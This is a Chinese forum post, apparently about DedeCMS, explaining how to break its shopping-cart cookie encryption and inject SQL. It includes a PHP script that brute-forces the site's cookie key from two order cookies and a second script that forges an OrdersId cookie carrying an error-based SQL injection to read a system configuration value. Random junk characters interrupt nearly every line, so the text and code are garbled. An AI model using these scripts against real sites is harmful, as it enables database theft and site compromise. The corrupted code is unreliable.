www.xxx.com/plus/search.php?keyword=
/ l- k8 j/ b# {* J& v" e0 d1 n在 include/shopcar.class.php中
% G4 e8 k8 l4 F! o. X/ A x先看一下这个shopcar类是如何生成cookie的; _9 u% q3 I' f& K8 `7 q1 U& N+ X
239 function saveCookie($key,$value)$ S8 A$ ^% I& \# h2 l) q
240 { r" B7 u, W: [
241 if(is_array($value))* F( h |5 q! ?4 Q T% a8 G. e
242 {
" X0 V/ O5 Y, q( g6 T* E9 O1 o243 $value = $this->enCrypt($this->enCode($value));! J5 x% ]! p9 m6 W
244 }
& K9 q6 |( A- B) T9 G" p Q! d+ {245 else/ _# A/ r: C6 \# |
246 {0 l- x0 M8 h4 `, w; l. r
247 $value = $this->enCrypt($value);* K5 _0 z1 k- }& N2 z& t
248 }
" }: ~6 |. M+ B+ z$ y* H/ ?& ^' h C249 setcookie($key,$value,time()+36000,’/');
- o- \. h9 g/ A+ L7 K250 }8 r# J* v6 _6 e8 X3 o. @
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数" I; t- t. `; j
186 function enCrypt($txt). n& L" S x- F" `6 T8 ^
187 {9 G$ h0 |9 ] X! D
188 srand((double)microtime() * 1000000);
0 M5 ^- v I: m7 }. P* m* w9 A189 $encrypt_key = md5(rand(0, 32000));- n; m, y* w& {* x4 P% [
190 $ctr = 0;
: h( Z/ z; j e8 a% k$ o2 {191 $tmp = ”;. y' @$ w, k3 r! s% |- e4 H
192 for($i = 0; $i < strlen($txt); $i++)
% f8 g y! Y1 s& A. p193 {0 f$ L2 I; O: a9 ^2 d6 P) B
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
6 { y! Q$ S' N( R" p8 \195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 J! c/ N; y H P4 g
196 }
* p* y' M$ E$ f5 C, ^197 return base64_encode($this->setKey($tmp));
: q% e& v% S; x4 b* q198 }0 J$ Y; N, k0 O
213 function setKey($txt)0 r3 v% ?$ J: o
214 {! v9 w6 s' [6 B) g$ T$ w# p
215 global $cfg_cookie_encode;
1 Q% H' F5 r* B7 J/ t216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
7 r, `2 g% R& \! C217 $ctr = 0;, z. }9 t0 E C) Y0 \8 c: Z
218 $tmp = ”;
! U8 e7 H2 [3 y, U' G9 j6 A219 for($i = 0; $i < strlen($txt); $i++)1 z: T$ W; g2 {7 O
220 {
& a, ]# O7 c. p* \# I9 \221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
/ e* G( l& x3 P$ s }3 {222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];" P) \- n, l. i, I# V
223 }, r+ ]. l/ o S% T! w: ~4 q% H$ d
224 return $tmp;
" N9 N- R. F2 v2 W# w" [1 W% s225 }3 F0 \7 @$ a' I+ L! A$ B$ g2 O
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
9 j: R- c, C& t9 W1 m然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。/ U7 j% z& ?* O0 E( h8 c
具体代码如下:$ z( S) B Q+ ~5 \6 u' p! X
<?php
3 r2 l+ B; ?; T9 M' u$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here6 I& g0 a7 t! _) W& A0 [
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
( l; h; |9 Z, h2 q' n0 x( z$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here$ q* O0 V7 o5 o- Y
function reStrCode($code,$string)
4 A6 T) Z$ d0 `+ w+ u; f{
0 Y v0 M7 x1 z& Q' C0 y% \* s$code = base64_decode($code);9 L; @, F6 _3 V: t' u
$key = “”;
Q9 A" h) Z! P' ~+ e' q" X+ [for($i=0 ; $i<32 ; $i++)
# x, q% S6 N% d7 g{7 v7 o. A- h: Y8 Z4 ] d
$key .= $string[$i] ^ $code[$i];
% O6 g/ f4 Z/ h S: X& s}
S1 H3 S D( d% q+ e6 |return $key;9 o( v( _7 |8 n8 L' T [% y
}; E0 B# ?( g/ o V/ V) R: t* Y
function getKeys($cookie,$plantxt)
; E9 ^* Q" u: H{; t# \+ |( g' r9 c. S [ S) n( I
$tmp = $cookie;
8 z7 u' {: V( @$ i/ X$results = array();
, w; `' D+ A# z- ?. V( Dfor($j=0 ; $j < 32000; $j++)0 a- d4 H9 y: o7 w0 n
{
t0 K3 W$ M k+ {7 R k; q$ t8 [1 f
$txt = $plantxt;+ V3 K) Y! e' ]& b' n+ C
$ctr = 0;
2 l* z0 k. P/ a7 z i/ M, u+ n$tmp = ”;# g, v$ D+ ]1 p& }
$encrypt_key = md5($j);' `( i4 _% e2 x! i
for($i =0; $i < strlen($txt); $i ++)
# Y; O4 k! Z/ {" x4 I5 ?& [3 _{
- N" ?% o# E1 x$ f: Q( I/ |) [" \$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 A5 o0 n* V# M3 L
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);& S* z5 h$ a; C" A# e
}1 z, |% f( k, U: q0 w
$string = $tmp;
( F/ X3 k: O- w0 }$code = $cookie;$ Y6 E9 J0 z7 N& |5 h8 U. f
$result = reStrCode($code,$string);, w2 v _6 }+ p
if(eregi(‘^[a-z0-9]+$’,$result))
; F0 f1 h7 Y' J5 c{
8 N8 i4 B& [. a8 ^, n' wecho $result.”\n”;
8 Q& w& y9 ], T. H S$results[] = $result;, |$ K) g3 }1 C# n+ ~$ n( s
}
+ |- [& O& a7 ~$ w% @$ p}) y* t7 A3 P3 A
return $results;7 h7 ^' I6 J2 {( }( K$ F3 R7 `( n. k# Q
}
$ Y5 X4 G, Y i) Y$results1 = getKeys($cookie1,$plantxt);
* @ A8 N9 {7 Z. R C$results2 = getKeys($cookie2,$plantxt);
; L4 @4 ?! c. [( v: ^2 d. [: |print “\n——————–real key————————–\n”;4 `8 b, u" h- Q v8 Z, m2 c
foreach($results1 as $test1)5 F+ q; t+ ^2 p6 B( z4 {2 \
{
5 \1 Q# h. }& o/ ~5 ]5 o4 B/ Y% Iforeach($results2 as $test2)
4 o" Y+ n6 J. o( V3 \0 g, e8 E{! W9 U! }0 Q5 j6 P* {. B
if($test1 == $test2), n% |6 k h+ N1 R
{
* c7 |$ r" J0 l8 }6 a1 f, ?" oecho $test1.”\n”;% Q4 j4 l* d4 r& c) O" `2 a
}
^3 ^ S+ b% j o$ ?0 K, c I2 p}
5 n% P# g1 I% d5 s2 Y}1 V! v6 m" F) M- l; S6 j0 U
?>1 W2 J5 D c# e r- y! \
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
) _6 y1 U2 F! Y3 c& {plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua15 F5 p9 B& Q5 k- v" I: u" I% w0 ]
然后推算出md5(strtolower($cfg_cookie_encode))
& S9 h- a! `3 D" M; p, {% T得到这个key之后,我们就可以构造任意购物车的cookie" H! x8 g w( I' W, o3 ~
接着看
: T: l6 V' s# n8 U8 z20 class MemberShops
8 u6 K9 n8 X! n1 y3 X21 {
+ v. m* a5 R C7 v* p22 var $OrdersId;! s3 _) D1 n" ~8 Q9 e0 e0 e: j
23 var $productsId;" c! ]" t5 d( D, T! k) i4 ?' ?: k
243 q% ^ a4 B- `' \6 c( ?; K; l
25 function __construct(); Q3 B; z D+ y" Z+ B
26 {" z' l8 J) f" q6 H, _
27 $this->OrdersId = $this->getCookie(“OrdersId”);
" v8 x/ T) L4 Y$ X/ |28 if(empty($this->OrdersId))
3 F* s: F, K" v! D29 {+ K1 }* L& t! q3 U, I
30 $this->OrdersId = $this->MakeOrders();
" b% R6 N2 k* O s31 }9 f: t9 z' Z% y
32 }0 V1 \, g3 n! \/ H8 H
发现OrderId是从cookie里面获取的
3 F4 Z6 p ^/ d- A; g/ ?然后
3 H! d0 }8 K0 v+ C- X/plus/carbuyaction.php中的/ I W# @# Q2 M6 F& Q
29 $cart = new MemberShops();( z4 E$ C3 h/ I Z0 _: m
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
. Y% s0 F+ U) O v% P……6 _1 e" A: R6 ?+ j( _/ Z5 j* W
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
. Y/ r0 g* W; Q( B接着我们就可以注入了0 Y W2 {) l+ `& _4 b. J
通过利用下面代码生成cookie:
, a" e7 v9 M4 g1 h; e5 F4 Y<?php( |- K5 y9 E) \! A" m9 T
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
6 g- V, M; D' X1 z$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here$ h% R n% m' t) B0 K* J% {0 _5 N
function setKey($txt)
) g0 f6 q( i' v' z{" e0 z0 i8 N& B# U4 }
global $encrypt_key;
- C/ w2 M1 N( s1 M1 D. o$ctr = 0;
$ e% [8 Q ~9 m0 S$tmp = ”;
; i1 ]2 q5 h' e" \4 M/ j% z4 {for($i = 0; $i < strlen($txt); $i++)
, y1 r+ b: W6 t/ _! ]{7 X4 \' C$ C+ g0 M8 L
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* ]9 X, y6 R/ j7 s
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. A* ^5 t- f5 W* C6 V}8 v; S8 H8 L8 H( B; G! _
return $tmp;
/ V7 G3 E! z1 H0 K}2 F% N; G j) u7 F n, ]
function enCrypt($txt)
2 Y; e1 ~5 j8 X{, O, i y8 ?$ F: B/ k( h
srand((double)microtime() * 1000000);" K- n3 R5 \3 {6 x
$encrypt_key = md5(rand(0, 32000));
( t1 K# q# s% H2 z$ ]0 }* e$ctr = 0;
1 }" K) ?0 `9 a p% v3 p$tmp = ”;
" }% u- \9 P7 ]. R+ O* W3 C- _8 E9 F0 gfor($i = 0; $i < strlen($txt); $i++). {8 |, g# {8 H9 ^7 }) ]- ]
{
$ J9 ?8 j1 V7 C' ?: j2 c0 F$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;" e7 \' ]6 F/ n
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);$ E0 A+ E% M" E1 J1 C- S
}( e0 x8 {, @) _: h
return base64_encode(setKey($tmp));- U J6 t- u1 y5 ?2 }
}
9 o8 P0 `9 o& y8 p; J0 efor($dest =0;$dest = enCrypt($txt);)
x: ^. L8 ^5 \) ^{- D" f5 A6 u& w; R- E
if(!strpos($dest,’+'))/ B- F! L' f; S
{
2 {! q* Z- a. z4 ? ?+ i* Bbreak;% R* a0 k5 W/ s. _
}9 ^4 W5 F! v+ K1 W
}
0 Q/ S _2 e9 W6 ]1 D' Decho $dest.”\n”;$ H: j) k$ n6 J( x7 N5 b' B
?>
2 r8 n5 C3 C! D" g7 O+ K' o9 N7 T* `6 e, H Q1 R U: `
|
发表于 2013-2-13 23:58:29
收藏
支持
反对